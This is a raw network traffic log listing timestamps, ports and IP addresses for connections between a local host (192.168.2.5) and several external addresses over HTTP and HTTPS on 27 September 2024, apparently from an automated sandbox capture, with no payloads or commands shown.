Sep 27, 2024 00:15:11.705692053 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705708981 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705733061 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705743074 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705745935 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705745935 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705755949 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705766916 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705776930 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705773115 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705789089 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705799103 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705799103 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705801964 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705812931 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705825090 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705833912 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705836058 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705871105 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705871105 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705873966 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705884933 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705895901 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705913067 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705913067 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705926895 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705926895 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705939054 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705950975 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705952883 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705966949 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.705981016 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.705992937 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706003904 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706015110 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706022978 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706022978 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706022978 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706073999 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706073999 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706387997 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706449032 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706461906 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706466913 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706480980 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706494093 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706542015 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706583977 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706583977 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706583977 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706583977 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706672907 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706685066 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706703901 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706716061 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706727028 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706738949 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706743956 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706744909 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706744909 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706760883 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706772089 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706784010 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706795931 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706832886 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706845045 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706855059 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706866026 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706868887 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706868887 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706868887 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706868887 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706868887 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706877947 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706916094 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706919909 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706919909 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.706927061 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706937075 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.706948042 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707014084 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707014084 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707021952 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707034111 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707043886 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707071066 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707099915 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707101107 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707113028 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707124949 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707155943 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707166910 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707231998 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707243919 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707253933 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707258940 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707272053 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707278013 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707283974 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707294941 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707308054 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707377911 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707377911 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707377911 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707398891 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707412004 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707423925 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707434893 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707443953 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707446098 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707458019 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707468987 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707523108 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707535982 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707540035 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707540035 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707540035 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707540035 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707547903 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707561016 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707561016 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707573891 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707583904 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.707638979 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707638979 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.707638979 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.794403076 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.800699949 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983638048 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983664989 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983675003 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983726025 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983737946 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983748913 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983761072 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983772993 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983772993 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.983772993 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.983772993 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.983884096 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.983886003 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983926058 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983938932 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983948946 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.983952999 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983974934 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983978987 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.983978987 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.983987093 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.983989954 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.983999014 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984014034 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984030962 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984044075 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984045029 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984054089 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984080076 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984091997 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984179974 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984190941 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984203100 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984257936 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984257936 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984261036 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984272957 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984283924 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984296083 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984317064 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984319925 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984319925 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984328985 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984339952 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984353065 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984407902 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984407902 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984458923 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984469891 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984479904 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984493017 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984503984 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984513998 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984517097 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984589100 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984589100 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984605074 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984616995 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984628916 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984647036 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984661102 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984675884 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984675884 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984697104 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984709024 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984719992 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984730959 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984741926 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984741926 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984747887 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984749079 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984790087 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984790087 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984909058 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984920979 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984930992 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984941006 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984951973 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984961033 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984961033 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984963894 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984975100 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984985113 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.984986067 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.984997034 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985014915 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985017061 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985033035 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985040903 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985083103 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985112906 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985124111 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985148907 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985151052 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985160112 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985172033 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985198975 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985198975 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985198975 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985214949 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985224962 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985236883 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985246897 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985258102 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985275030 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985275030 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985325098 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985337019 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985347033 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985358953 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985366106 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985367060 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985371113 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985380888 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:11.985395908 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:11.985476017 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:12.362196922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:12.368379116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:12.855406046 CEST	49710	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:15:12.855456114 CEST	443	49710	172.67.194.216	192.168.2.5
Sep 27, 2024 00:15:12.855600119 CEST	49710	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:15:12.859679937 CEST	49710	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:15:12.859697104 CEST	443	49710	172.67.194.216	192.168.2.5
Sep 27, 2024 00:15:13.331235886 CEST	443	49710	172.67.194.216	192.168.2.5
Sep 27, 2024 00:15:13.331398010 CEST	49710	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:15:13.367708921 CEST	49710	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:15:13.367728949 CEST	443	49710	172.67.194.216	192.168.2.5
Sep 27, 2024 00:15:13.368105888 CEST	443	49710	172.67.194.216	192.168.2.5
Sep 27, 2024 00:15:13.421371937 CEST	49710	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:15:14.030108929 CEST	49710	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:15:14.030191898 CEST	49710	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:15:14.030292988 CEST	443	49710	172.67.194.216	192.168.2.5
Sep 27, 2024 00:15:14.361155033 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:14.366420031 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.366631031 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:14.393722057 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:14.398804903 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.490715027 CEST	443	49710	172.67.194.216	192.168.2.5
Sep 27, 2024 00:15:14.490848064 CEST	443	49710	172.67.194.216	192.168.2.5
Sep 27, 2024 00:15:14.490942955 CEST	49710	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:15:14.492336988 CEST	49710	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:15:14.492356062 CEST	443	49710	172.67.194.216	192.168.2.5
Sep 27, 2024 00:15:14.517751932 CEST	49712	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:15:14.517786026 CEST	443	49712	104.21.4.136	192.168.2.5
Sep 27, 2024 00:15:14.517848015 CEST	49712	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:15:14.519093037 CEST	49712	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:15:14.519107103 CEST	443	49712	104.21.4.136	192.168.2.5
Sep 27, 2024 00:15:14.988224983 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.988249063 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.988260031 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.988343954 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:14.988368988 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.988382101 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.988393068 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.988398075 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.988415956 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:14.988435984 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.988476038 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:14.988476038 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:14.988578081 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.988590956 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.988982916 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:14.993624926 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.993695021 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.993710995 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:14.993741989 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:15.015507936 CEST	443	49712	104.21.4.136	192.168.2.5
Sep 27, 2024 00:15:15.015563011 CEST	49712	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:15:15.018487930 CEST	49712	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:15:15.018501043 CEST	443	49712	104.21.4.136	192.168.2.5
Sep 27, 2024 00:15:15.018812895 CEST	443	49712	104.21.4.136	192.168.2.5
Sep 27, 2024 00:15:15.020277977 CEST	49712	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:15:15.020400047 CEST	49712	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:15:15.020447016 CEST	443	49712	104.21.4.136	192.168.2.5
Sep 27, 2024 00:15:15.046330929 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.081320047 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081336975 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081348896 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081367016 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081373930 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081382990 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081396103 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.081403971 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081418037 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081458092 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.081475973 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.081708908 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081720114 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081731081 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081743002 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081754923 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081767082 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081779003 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081779957 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.081808090 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.081824064 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081835985 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081846952 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081857920 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081861019 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.081871033 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081882954 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.081888914 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.081927061 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.082550049 CEST	80	49711	147.45.44.104	192.168.2.5
